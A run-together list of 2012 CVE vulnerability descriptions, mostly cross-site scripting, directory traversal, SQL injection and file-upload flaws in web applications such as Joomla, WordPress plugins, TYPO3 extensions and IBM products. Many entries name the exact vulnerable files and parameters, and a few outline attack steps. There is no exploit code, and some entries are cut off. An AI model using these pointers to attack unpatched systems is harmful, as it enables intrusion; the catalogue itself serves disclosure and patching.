[CVE-2012-1290] Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp in the Internet Sales (crm.b2b) module in SAP NetWeaver 7.0 allows remote attackers to inject arbitrary web script or HTML via the _loadPage parameter. [CVE-2012-1289] Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component. [CVE-2012-1262] Cross-site scripting (XSS) vulnerability in cgi-bin/mt/mt-wizard.cgi in Movable Type before 4.38, 5.0x before 5.07, and 5.1x before 5.13, when the product is incompletely installed, allows remote attackers to inject arbitrary web script or HTML via the dbuser parameter, a different vulnerability than CVE-2012-0318. [CVE-2012-1254] Cross-site scripting (XSS) vulnerability in Segue 2.2.10.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1253] Cross-site scripting (XSS) vulnerability in Roundcube Webmail before 0.7, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via vectors involving an embedded image attachment. [CVE-2012-1252] Cross-site scripting (XSS) vulnerability in RSSOwl before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via a feed, a different vulnerability than CVE-2006-4760. [CVE-2012-1249] The iLunascape application 1.0.4.0 and earlier for Android does not properly implement the WebView class, which allows remote attackers to obtain sensitive stored information via a crafted application. [CVE-2012-1247] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB MART 1.7 and earlier, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML by leveraging support for Cascading Style Sheets (CSS) expressions. [CVE-2012-1246] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB MART 1.7 and earlier might allow remote attackers to inject arbitrary web script or HTML via a crafted cookie. [CVE-2012-1245] Cross-site scripting (XSS) vulnerability in the cleanup_urls function in forum/utils/html.py in OSQA before 1234, and 0.9.0 Beta 3 and earlier, allows remote attackers to inject arbitrary web script or HTML via vectors related to a crafted URI. [CVE-2012-1243] The TwitRocker2 application before 1.0.23 for Android does not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application. [CVE-2012-1240] Cross-site scripting (XSS) vulnerability in the RECRUIT Dokodemo Rikunabi 2013 extension before 1.0.1 for Google Chrome allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1238] Session fixation vulnerability in SENCHA SNS before 1.0.2 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2012-1235] Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0235. [CVE-2012-1234] SQL injection vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to execute arbitrary SQL commands via a malformed URL. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0234. [CVE-2012-1224] Cross-site scripting (XSS) vulnerability in system/classes/login.php in ContentLion Alpha 1.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2012-1219] Multiple cross-site scripting (XSS) vulnerabilities in freelancerKit 2.35 allow remote attackers to inject arbitrary web script or HTML via the (1) ticket parameter to tickets.php, (2) title parameter to notes.php, or (3) task parameter to todo.php. NOTE: some of these details are obtained from third party information. [CVE-2012-1217] Multiple cross-site scripting (XSS) vulnerabilities in STHS v2 Web Portal 2.2 allow remote attackers to inject arbitrary web script or HTML via the team parameter to (1) prospects.php, (2) prospect.php, or (3) team.php. [CVE-2012-1215] Cross-site scripting (XSS) vulnerability in the Add friends module in the Yoono extension before 7.7.8 for Firefox allows remote attackers to inject arbitrary web script or HTML via the create field in a "Create a group" action. [CVE-2012-1214] Cross-site scripting (XSS) vulnerability in the Add friends module in Yoono Desktop Application before 1.8.21 allows remote attackers to inject arbitrary web script or HTML via the create field in a "Create a group" action. [CVE-2012-1213] Cross-site scripting (XSS) vulnerability in zimbra/h/calendar in Zimbra Web Client allows remote attackers to inject arbitrary web script or HTML via the view parameter. [CVE-2012-1212] Cross-site scripting (XSS) vulnerability in the smwfOnSfSetTargetName function in extensions/SMWHalo/includes/SMW_Initialize.php in Semantic Enterprise Wiki (SMW+) 1.5.6, 1.6.0_2 and earlier allows remote attackers to inject arbitrary web script or HTML via the target parameter to index.php/Special:FormEdit. NOTE: some of these details are obtained from third party information. [CVE-2012-1211] Cross-site scripting (XSS) vulnerability in pfile/kommentar.php in Powie pFile 1.02 allows remote attackers to inject arbitrary web script or HTML via the filecat parameter. [CVE-2012-1209] Cross-site scripting (XSS) vulnerability in backend/core/engine/base.php in Fork CMS 3.2.4 and possibly other versions before 3.2.5 allows remote attackers to inject arbitrary web script or HTML via the highlight parameter. [CVE-2012-1208] Multiple cross-site scripting (XSS) vulnerabilities in backend/core/engine/base.php in Fork CMS 3.2.4 and possibly other versions before 3.2.5 allow remote attackers to inject arbitrary web script or HTML via the (1) report parameter to blog/settings or (2) error parameter to users/index. [CVE-2012-1196] Directory traversal vulnerability in the VulCore web service (WSVulnerabilityCore/VulCore.asmx) in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to delete arbitrary files via a .. (dot dot) in the filename parameter in a SetTaskLogByFile SOAP request. [CVE-2012-1195] Unrestricted file upload vulnerability in andesk/managementsuite/core/core.anonymous/ServerSetup.asmx in the ServerSetup web service in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to execute arbitrary code by uploading a file with an executable extension via a PutUpdateFileCore command in a RunAMTCommand SOAP request, then accessing the file via a direct request to the file in the web root. [CVE-2012-1190] Cross-site scripting (XSS) vulnerability in the replication-setup functionality in js/replication.js in phpMyAdmin 3.4.x before 3.4.10.1 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted database name. [CVE-2012-1188] Multiple cross-site scripting (XSS) vulnerabilities in Fork CMS before 3.2.7 allow remote attackers to inject arbitrary web script or HTML via the (1) type or (2) querystring parameters to private/en/error or (3) name parameter to private/en/locale/index. [CVE-2012-1167] The JBoss Server in JBoss Enterprise Application Platform 5.1.x before 5.1.2 and 5.2.x before 5.2.2, Web Platform before 5.1.2, BRMS Platform before 5.3.0, and SOA Platform before 5.3.0, when the server is configured to use the JaccAuthorizationRealm and the ignoreBaseDecision property is set to true on the JBossWebRealm, does not properly check the permissions created by the WebPermissionMapping class, which allows remote authenticated users to access arbitrary applications. [CVE-2012-1117] Cross-site scripting (XSS) vulnerability in Joomla! 2.5.0 and 2.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1113] Multiple cross-site scripting (XSS) vulnerabilities in the administration subsystem in Gallery 2 before 2.3.2 and 3 before 3.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1110] Multiple cross-site scripting (XSS) vulnerabilities in Etano 1.22 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user, (2) email, (3) email2, (4) f17_zip, or (5) agree parameter to join.php [CVE-2012-1103] emacs/notmuch-mua.el in Notmuch before 0.11.1, when using the Emacs interface, allows user-assisted remote attackers to read arbitrary files via crafted MML tags, which are not properly quoted in an email reply cna cause the files to be attached to the message. [CVE-2012-1099] Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_options_helper.rb in the select helper in Ruby on Rails 3.0.x before 3.0.12, 3.1.x before 3.1.4, and 3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving certain generation of OPTION elements within SELECT elements. [CVE-2012-1098] Cross-site scripting (XSS) vulnerability in Ruby on Rails 3.0.x before 3.0.12, 3.1.x before 3.1.4, and 3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving a SafeBuffer object that is manipulated through certain methods. [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package. [CVE-2012-1087] Cross-site scripting (XSS) vulnerability in the Post data records to facebook (bc_post2facebook) extension before 0.2.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1086] Cross-site scripting (XSS) vulnerability in the UrlTool (aeurltool) extension 0.1.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1084] Cross-site scripting (XSS) vulnerability in the BE User Switch (beuserswitch) extension 0.0.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1082] Cross-site scripting (XSS) vulnerability in the Terminal PHP Shell (terminal) extension 0.3.2 and earlier for TYPO3 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1081] Cross-site scripting (XSS) vulnerability in the Yet another Google search (ya_googlesearch) extension before 0.3.10 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1080] Cross-site scripting (XSS) vulnerability in the Euro Calculator (skt_eurocalc) extension 0.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1079] Unspecified vulnerability in the Webservices for TYPO3 (typo3_webservice) extension before 0.3.8 for TYPO3 allows remote authenticated users to execute arbitrary code via unknown vectors. [CVE-2012-1076] Cross-site scripting (XSS) vulnerability in the Documents download (rtg_files) extension before 1.5.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1073] Cross-site scripting (XSS) vulnerability in the Category-System (toi_category) extension 0.6.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1070] Cross-site scripting (XSS) vulnerability in the Modern FAQ (irfaq) extension 1.1.2 and other versions before 1.1.4 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to the "return url parameter." [CVE-2012-1069] Cross-site scripting (XSS) vulnerability in module/kb/search_word in the search module in lknSupport allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2012-1068] Cross-site scripting (XSS) vulnerability in the rc_ajax function in core.php in the WP-RecentComments plugin before 2.0.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter, related to AJAX paging. [CVE-2012-1066] Cross-site scripting (XSS) vulnerability in the template module in SmartyCMS 0.9.4 allows remote attackers to inject arbitrary web script or HTML via the title bar. [CVE-2012-1064] Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer SmartSuite Framework 4.x and RSA Archer GRC 5.x before 5.2SP1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1062] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Applications Manager 9.x and 10.x allow remote attackers to inject arbitrary web script or HTML via the (1) period parameter to showHistoryData.do [CVE-2012-1060] Multiple cross-site scripting (XSS) vulnerabilities in revisioning_theme.inc in the Taxonomy module in the Revisioning module 6.x-3.13 and other versions before 6.x-3.14 for Drupal allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) tags or (2) term parameters. [CVE-2012-1059] Cross-site scripting (XSS) vulnerability in osCommerce/OM/Core/Site/Shop/Application/Cart/pages/main.php in OSCommerce Online Merchant 3.0.2 allows remote attackers to inject arbitrary web script or HTML via the value_title parameter, as demonstrated using the "Front" field in the shirt module. [CVE-2012-1049] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ADManager Plus 5.2 Build 5210 allow remote attackers to inject arbitrary web script or HTML via the (1) domainName parameter to jsp/AddDC.jsp or (2) operation parameter to DomainConfig.do. [CVE-2012-1048] Cross-site scripting (XSS) vulnerability in communityplusplus/www/administrator.php in eFront Community++ edition 3.6.10, and possibly other editions, allows remote attackers to inject arbitrary web script or HTML via the filter parameter. [CVE-2012-1046] Cross-site scripting (XSS) vulnerability in TM1 Web in IBM Cognos TM1 9.5.2 FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0696. [CVE-2012-1039] Multiple cross-site scripting (XSS) vulnerabilities in Dotclear before 2.4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) login_data parameter to admin/auth.php [CVE-2012-1038] Cross-site scripting (XSS) vulnerability in the WebAAA login funtionality (wba_login.html) in Juniper Networks Mobility System Software (MSS) 7.6.x before 7.6.3, 7.7.x before 7.7.1, 7.5.x before 7.5.3, and other unspecified versions before 7.4 and 7.3 allows remote attackers to inject arbitrary web script or HTML via a crafted parameter name. [CVE-2012-1036] Cross-site scripting (XSS) vulnerability in the telerik HTML editor in DotNetNuke before 5.6.4 and 6.x before 6.1.0 allows remote attackers to inject arbitrary web script or HTML via a message. [CVE-2012-1035] AdaCore Ada Web Services (AWS) before 2.10.2 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. [CVE-2012-1031] Unspecified vulnerability in EPiServer CMS 5 and 6 through 6R2, in certain configurations using Forms Authentication, allows remote authenticated users to obtain WebAdmins access by leveraging Edit Mode privileges, a different vulnerability than CVE-2011-3416 and CVE-2011-3417. [CVE-2012-1030] Cross-site scripting (XSS) vulnerability in DotNetNuke 6.x through 6.0.2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted URL containing text that is used within a modal popup. [CVE-2012-1028] Cross-site scripting (XSS) vulnerability in bin/index.php in SimpleGroupware 0.742 and other versions before 0.743 allows remote attackers to inject arbitrary web script or HTML via the export parameter. [CVE-2012-1027] Cross-site scripting (XSS) vulnerability in account-closed.tcl in ]project-open[ (aka ]po[) 3.4.x, 3.5.0.1-2, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the message parameter to register/account-closed. [CVE-2012-1023] Open redirect vulnerability in admin/index.php in 4images 1.7.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter. [CVE-2012-1021] Cross-site scripting (XSS) vulnerability in admin/categories.php in 4images 1.7.10 allows remote attackers to inject arbitrary web script or HTML via the cat_parent_id parameter in an addcat action. [CVE-2012-1020] Multiple cross-site scripting (XSS) vulnerabilities in login.php in NexorONE Online Banking allow remote attackers to inject arbitrary web script or HTML via the (1) visitor_language parameter to register.php or (2) message parameter. [CVE-2012-1019] Multiple cross-site scripting (XSS) vulnerabilities in XWiki Enterprise 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) XWiki.XWikiComments_comment parameter to xwiki/bin/commentadd/Main/WebHome, (2) XWiki.XWikiUsers_0_company parameter when editing a user profile, or (3) projectVersion parameter to xwiki/bin/view/DownloadCode/DownloadFeedback. NOTE: some of these details are obtained from third party information. [CVE-2012-1018] Cross-site scripting (XSS) vulnerability in includes/convert.php in D-Mack Media Currency Converter (mod_currencyconverter) module 1.0.0 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the from parameter. [CVE-2012-1011] actions.php in the AllWebMenus plugin 1.1.8 for WordPress allows remote attackers to bypass intended access restrictions to upload and execute arbitrary PHP code by setting the HTTP_REFERER to a certain value, then uploading a ZIP file containing a PHP file, then accessing it via a direct request to the file in an unspecified directory. [CVE-2012-1010] Unrestricted file upload vulnerability in actions.php in the AllWebMenus plugin before 1.1.8 for WordPress allows remote attackers to execute arbitrary PHP code by uploading a ZIP file containing a PHP file, then accessing it via a direct request to the file in an unspecified directory. [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do. [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders. [CVE-2012-1005] Multiple cross-site scripting (XSS) vulnerabilities in Sphinx Software Mobile Web Server 3.1.2.47 allow remote attackers to inject arbitrary web script or HTML via the comment parameter to a blog, as demonstrated using (1) Blog/MyFirstBlog.txt or (2) Blog/AboutSomething.txt. [CVE-2012-1004] Multiple cross-site scripting (XSS) vulnerabilities in UI/Register.pm in Foswiki before 1.1.5 allow remote authenticated users with CHANGE privileges to inject arbitrary web script or HTML via the (1) text, (2) FirstName, (3) LastName, (4) OrganisationName, (5) OrganisationUrl, (6) Profession, (7) Country, (8) State, (9) Address, (10) Location, (11) Telephone, (12) VoIP, (13) InstantMessagingIM, (14) Email, (15) HomePage, or (16) Comment parameter. NOTE: some of these details are obtained from third party information. [CVE-2012-1000] Multiple cross-site scripting (XSS) vulnerabilities in LEPTON 1.1.3 and other versions before 1.1.4 allow remote attackers to inject arbitrary web script or HTML via the (1) message parameter to admins/login/forgot/index.php, or the (2) display_name or (3) email parameter to account/preferences.php. [CVE-2012-0995] Multiple cross-site scripting (XSS) vulnerabilities in ZENphoto 1.4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) msg parameter in an external action to zp-core/admin.php, (2) PATH_INTO to an unspecified URL, as demonstrated using /1/, (3) PATH_INFO to zp-core/admin.php, or (4) album parameter to zp-core/admin-edit.php. [CVE-2012-0992] interface/fax/fax_dispatch.php in OpenEMR 4.1.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the file parameter. [CVE-2012-0989] Cross-site scripting (XSS) vulnerability in OneOrZero AIMS 2.8.0 Trial Edition build231211 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php. [CVE-2012-0988] Multiple cross-site scripting (XSS) vulnerabilities in config/dmsDefaults.php in KnowledgeTree 3.7.0.2 and possibly earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) login.php, (2) admin.php, or (3) preferences.php. [CVE-2012-0986] Multiple cross-site scripting (XSS) vulnerabilities in ImpressCMS 1.2.x before 1.2.7 Final and 1.3.x before 1.3.1 Final allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) notifications.php, (2) modules/system/admin/images/browser.php, and (3) modules/content/admin/content.php. [CVE-2012-0979] Cross-site scripting (XSS) vulnerability in TWiki allows remote attackers to inject arbitrary web script or HTML via the organization field in a profile, involving (1) registration or (2) editing of the user. [CVE-2012-0976] Cross-site scripting (XSS) vulnerability in admin/EditForm in SilverStripe 2.4.6 allows remote authenticated users with Content Authors privileges to inject arbitrary web script or HTML via the Title parameter. NOTE: some of these details are obtained from third party information. [CVE-2012-0975] Cross-site scripting (XSS) vulnerability in misc.php in Image Hosting Script DPI 1.0, 1.3, and earlier allows remote attackers to inject arbitrary web script or HTML via the showseries parameter. [CVE-2012-0974] Multiple cross-site scripting (XSS) vulnerabilities in the getParam function in oc-includes/osclass/core/Params.php in OSClass before 2.3.5 allow remote attackers to inject arbitrary web script or HTML via the (1) sCity, (2) sPattern, (3) sPriceMax, and (4) sPriceMin parameters in a search action to index.php. [CVE-2012-0958] content/unity-api.js in the unity-firefox-extension extension 2.4.1 for Firefox exposes the toDataURL function in an API call, which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted webpage. [CVE-2012-0956] ubiquity-slideshow-ubuntu before 58.2, during installation, allows remote man-in-the-middle attackers to execute arbitrary web script or HTML and read arbitrary files via a crafted attribute in the <a> tag of a Twitter feed. [CVE-2012-0936] Cross-site scripting (XSS) vulnerability in web/springframework/security/SecurityAuthenticationEventOnmsEventBuilder.java in OpenNMS 1.8.x before 1.8.17, 1.9.93 and earlier, and 1.10.x before 1.10.1 allows remote attackers to inject arbitrary web script or HTML via the Username field, related to login. [CVE-2012-0933] Multiple cross-site scripting (XSS) vulnerabilities in Acidcat CMS 3.5.1, 3.5.2, 3.5.6, and possibly earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin_colors.asp, (2) admin_config.asp, and (3) admin_cat_add.asp in admin/. [CVE-2012-0932] Cross-site scripting (XSS) vulnerability in admin/login.php in Lead Capture Page System allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2012-0930] Cross-site scripting (XSS) vulnerability in Schneider Electric Modicon Quantum PLC allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0919] Cross-site scripting (XSS) vulnerability in Hitachi IT Operations Director 02-50-01 through 02-50-07, 03-00 through 03-00-04, and possibly other versions before 03-00-06, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0917] Cross-site scripting (XSS) vulnerability in Hitachi IT Operations Analyzer 02-01, 02-51 through 02-51-01, and 02-53 through 02-53-02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0914] Cross-site scripting (XSS) vulnerability in display_renderers/panels_renderer_editor.class.php in the admin view in the Panels module 6.x-2.x before 6.x-3.10 and 7.x-3.x before 7.x-3.0 for Drupal allows remote authenticated users with certain privileges to inject arbitrary web script or HTML via the Region title. [CVE-2012-0912] SQL injection vulnerability in Stoneware webNetwork before 6.0.8.0 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2012-0909] Cross-site scripting (XSS) vulnerability in Horde_Form in Horde Groupware Webmail Edition before 4.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to email verification. NOTE: Some of these details are obtained from third party information. [CVE-2012-0908] Cross-site scripting (XSS) vulnerability in logout.php in SimpleSAMLphp 1.8.1 and possibly other versions before 1.8.2 allows remote attackers to inject arbitrary web script or HTML via the link_href parameter. [CVE-2012-0907] Directory traversal vulnerability in the web player in NeoAxis NeoAxis web player 1.4 and earlier allows user-assisted remote attackers to write arbitrary files via a .. (dot dot) in a filename in the neoaxis_web_application_win32.zip ZIP archive. [CVE-2012-0903] Multiple cross-site scripting (XSS) vulnerabilities in Zimbra Desktop 7.1.2 b10978 allow remote attackers to inject arbitrary web script or HTML via the (1) Username or (2) MailBox Name. [CVE-2012-0901] Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. [CVE-2012-0900] Multiple cross-site scripting (XSS) vulnerabilities in Beehive Forum 1.0.1 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) forum/register.php or (2) forum/logon.php. [CVE-2012-0899] Cross-site scripting (XSS) vulnerability in referencement/sites_inscription.php in Annuaire PHP allows remote attackers to inject arbitrary web script or HTML via the url parameter and possibly the nom parameter. [CVE-2012-0895] Cross-site scripting (XSS) vulnerability in map/map.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the map parameter. [CVE-2012-0878] Paste Script 1.7.5 and earlier does not properly set group memberships during execution with root privileges, which might allow remote attackers to bypass intended file-access restrictions by leveraging a web application that uses the local filesystem. [CVE-2012-0874] The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 do not require authentication by default in certain profiles, which might allow remote attackers to invoke MBean methods and execute arbitrary code via unspecified vectors. NOTE: this issue can only be exploited when the interceptor is not properly configured with a "second layer of authentication," or when used in conjunction with other vulnerabilities that bypass this second layer. [CVE-2012-0873] Multiple cross-site scripting (XSS) vulnerabilities in Boonex Dolphin before 7.0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) explain parameter to explanation.php or the (2) photos_only, (3) online_only, or (4) mode parameters to viewFriends.php. [CVE-2012-0872] Multiple cross-site scripting (XSS) vulnerabilities in OxWall 1.1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) captchaField, (2) email, (3) form_name, (4) password, (5) realname, (6) repeatPassword, or (7) username parameters to Oxwall/join [CVE-2012-0869] Cross-site scripting (XSS) vulnerability in fup in Frams' Fast File EXchange (FEX, aka fex) before 20120215 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2012-0865] Multiple open redirect vulnerabilities in CubeCart 3.0.20 and earlier allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the (1) r parameter to switch.php or (2) goto parameter to admin/login.php. [CVE-2012-0846] Cross-site scripting (XSS) vulnerability in Craig Knudsen WebCalendar 1.2.4 allows remote attackers to inject arbitrary web script or HTML via the Location variable. [CVE-2012-0834] Cross-site scripting (XSS) vulnerability in lib/QueryRender.php in phpLDAPadmin 1.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the base parameter in a query_engine action to cmd.php. [CVE-2012-0822] Cross-site scripting (XSS) vulnerability in Joomla! 1.6 and 1.7.x before 1.7.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0820. [CVE-2012-0820] Cross-site scripting (XSS) vulnerability in Joomla! 1.6.x and 1.7.x before 1.7.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0822. [CVE-2012-0797] The webservices functionality in Moodle 2.0.x before 2.0.7, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 allows remote authenticated users to bypass the deleted status and continue using a server via a token. [CVE-2012-0791] Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP before 5.0.18 and Horde Groupware Webmail Edition before 4.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) composeCache, (2) rtemode, or (3) filename_* parameters to the compose page [CVE-2012-0790] Cross-site scripting (XSS) vulnerability in smokeping_cgi in Smokeping 2.4.2, 2.6.6, and other versions before 2.6.7 allows remote attackers to inject arbitrary web script or HTML via the displaymode parameter. [CVE-2012-0782] DISPUTED Multiple cross-site scripting (XSS) vulnerabilities in wp-admin/setup-config.php in the installation component in WordPress 3.3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dbhost, (2) dbname, or (3) uname parameter. NOTE: the vendor disputes the significance of this issue [CVE-2012-0765] Multiple cross-site scripting (XSS) vulnerabilities in Adobe RoboHelp 8 and 9 for Word allow remote attackers to inject arbitrary web script or HTML via a crafted URL, related to certain .htm files in (1) template_stock and (2) template_csh directories. [CVE-2012-0746] Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0744] IBM Rational ClearQuest 7.1.x through 7.1.2.7 and 8.x through 8.0.0.3 allows remote attackers to obtain potentially sensitive information via a request to a (1) snoop, (2) hello, (3) ivt/, (4) hitcount, (5) HitCount.jsp, (6) HelloHTMLError.jsp, (7) HelloHTML.jsp, (8) HelloVXMLError.jsp, (9) HelloVXML.jsp, (10) HelloWMLError.jsp, (11) HelloWML.jsp, or (12) cqweb/j_security_check sample script. [CVE-2012-0740] Cross-site scripting (XSS) vulnerability in the Web Admin Tool in IBM Tivoli Directory Server (TDS) 6.2 before 6.2.0.22 and 6.3 before 6.3.0.11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0737] Cross-site scripting (XSS) vulnerability in IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0736] IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not properly create scan jobs, which allows remote attackers to execute arbitrary code via a crafted web site. [CVE-2012-0720] Cross-site scripting (XSS) vulnerability in the Integration Solution Console in the Administration Console in IBM WebSphere Application Server 7.0 before 7.0.0.23 allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2012-0719] Cross-site scripting (XSS) vulnerability in IBM Tivoli Endpoint Manager (TEM) 8 before 8.2 patch 3 allows remote attackers to inject arbitrary web script or HTML via the ScheduleParam parameter to the webreports program. [CVE-2012-0717] IBM WebSphere Application Server 7.0 before 7.0.0.23, when a certain SSLv2 configuration with client authentication is used, allows remote attackers to bypass X.509 client-certificate authentication via unspecified vectors. [CVE-2012-0716] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server 7.0 before 7.0.0.23 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0715] Cross-site scripting (XSS) vulnerability in the Gantt applet viewer in IBM Tivoli Change and Configuration Management Database (CCMDB) 7.2.1 and IBM ILOG JViews Gantt allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0708] Heap-based buffer overflow in the Ole API in the CQOle ActiveX control in cqole.dll in IBM Rational ClearQuest 7.1.1 before 7.1.1.9, 7.1.2 before 7.1.2.6, and 8.0.0 before 8.0.0.2 allows remote attackers to execute arbitrary code via a crafted web page that leverages a RegisterSchemaRepoFromFileByDbSet function-prototype mismatch. [CVE-2012-0707] Cross-site scripting (XSS) vulnerability in IBM WebSphere Lombardi Edition 7.2 allows remote attackers to inject arbitrary web script or HTML via crafted text input to a coach that is configured with a document attachment control section. [CVE-2012-0703] Open redirect vulnerability in Information Services Framework (ISF) in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-0696] Multiple cross-site scripting (XSS) vulnerabilities in the Executive Viewer (EV) in IBM Cognos TM1 before 9.5 FP1 allow remote attackers to inject arbitrary web script or HTML via unspecified requests to (1) aspnet_client or (2) evserver/createcontrol.js. [CVE-2012-0690] TIBCO Spotfire Web Application, Web Player Application, Automation Services Application, and Analytics Client Application in Spotfire Analytics Server before 10.1.2 [CVE-2012-0688] Cross-site scripting (XSS) vulnerability in TIBCO ActiveMatrix Platform in TIBCO Silver Fabric ActiveMatrix Service Grid Distribution 3.1.3, Service Grid and Service Bus 3.x before 3.1.5, BusinessWorks Service Engine 5.9.x before 5.9.3, 